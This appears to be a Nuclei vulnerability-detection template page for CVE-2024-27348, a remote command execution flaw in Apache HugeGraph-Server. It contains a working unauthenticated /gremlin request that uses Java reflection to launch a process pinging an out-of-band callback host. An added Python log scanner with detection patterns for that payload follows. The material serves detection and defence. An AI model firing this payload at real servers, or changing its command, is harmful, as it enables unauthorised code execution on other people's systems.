Apache HugeGraph-Server - Remote Command Execution
ID: CVE-2024-27348
Severity: high
Author: DhiyaneshDK
Tags: cve,cve2024,hugegraph,rce,apache,kev
Description
Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component.
YAML Source
id: CVE-2024-27348

info:
  name: Apache HugeGraph-Server - Remote Command Execution
  author: DhiyaneshDK
  severity: high
  description: |
    Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component.
  reference:
    - http://www.openwall.com/lists/oss-security/2024/04/22/3
    - https://hugegraph.apache.org/docs/config/config-authentication/#configure-user-authentication
    - https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9
    - https://github.com/Zeyad-Azima/CVE-2024-27348
    - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-27348
    - https://nvd.nist.gov/vuln/detail/CVE-2024-27348
  classification:
    cve-id: CVE-2024-27348
    cwe-id: CWE-77
    epss-score: 0.00045
    epss-percentile: 0.15047
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"HugeGraph"
    fofa-query: title="HugeGraph"
  tags: cve,cve2024,hugegraph,rce,apache,kev

http:
  - raw:
      - |
        POST /gremlin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{{interactsh-url}}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(header, "application/json")'
          - 'contains(body, "inputStream\":")'
        condition: and
# digest: 4b0a00483046022100a6b77073dcabe9fc9a67c28d1e4dd9ee5183bf70b711edb0d8c8b60e8155685e022100e1bcd5934193a0df71a297669e2e4af8161d95c7ea66bd7bf0c32e9a3fdc2639:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This template detects the vulnerability by sending a single unauthenticated POST to the /gremlin endpoint and matching on an out-of-band DNS callback plus the JSON response. It is run with the Nuclei tool; note that the request carries no credentials, the HugeGraph authentication guide is listed among the references, and releases 1.3.0 and later are not affected according to the description above.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-27348.yaml"
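As an added defender-side example (not part of the Nuclei template or the HugeGraph project), the following Python scans constructed request-log lines for POST /gremlin bodies that use the reflection constructs the template's request body relies on; the log line format, indicator names and sample entries are assumptions.

```python
from __future__ import annotations
import json
import re

# Constructs the template's request body relies on: it reflects into java.lang.Thread,
# calls setAccessible(true) and then instantiates java.lang.ProcessBuilder. These
# indicator names and patterns are assumptions of what a benign traversal lacks.
SUSPICIOUS_PATTERNS = {
    "reflection": r"Class\.forName\(",
    "accessible": r"setAccessible\(\s*true\s*\)",
    "thread-rename": r"Thread\.currentThread\(\)",
    "process-builder": r"java\.lang\.ProcessBuilder",
}

def classify_gremlin_body(body: str) -> list[str]:
    """Return the indicators found in the 'gremlin' field of a JSON request body."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return []
    script = doc.get("gremlin") if isinstance(doc, dict) else None
    if not isinstance(script, str):
        return []
    return [name for name, pat in SUSPICIOUS_PATTERNS.items() if re.search(pat, script)]

def scan_log(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Flag POST /gremlin entries. Assumed line format: '<ts> <ip> <method> <path> <body>'."""
    hits = []
    for line in lines:
        parts = line.split(" ", 4)
        if len(parts) < 5:
            continue
        _ts, ip, method, path, body = parts
        if method != "POST" or path.split("?", 1)[0] != "/gremlin":
            continue
        found = classify_gremlin_body(body)
        if found:
            hits.append((ip, found))
    return hits

# Constructed sample log: a normal traversal, a request shaped like the template's, a GET.
SAMPLE_LOG = [
    '2024-04-22T10:00:00Z 198.51.100.7 POST /gremlin {"gremlin": "g.V().has(\\"name\\",\\"marko\\").count()", "language": "gremlin-groovy"}',
    '2024-04-22T10:00:05Z 203.0.113.9 POST /gremlin {"gremlin": "Thread t = Thread.currentThread();Class clz = Class.forName(\\"java.lang.Thread\\");java.lang.reflect.Field f = clz.getDeclaredField(\\"name\\");f.setAccessible(true);Class pb = Class.forName(\\"java.lang.ProcessBuilder\\");", "language": "gremlin-groovy"}',
    '2024-04-22T10:00:09Z 198.51.100.7 GET /versions -',
]
```

Running `scan_log(SAMPLE_LOG)` reports only the second entry, with all four indicators; an ordinary traversal such as `g.V().count()` produces no hit.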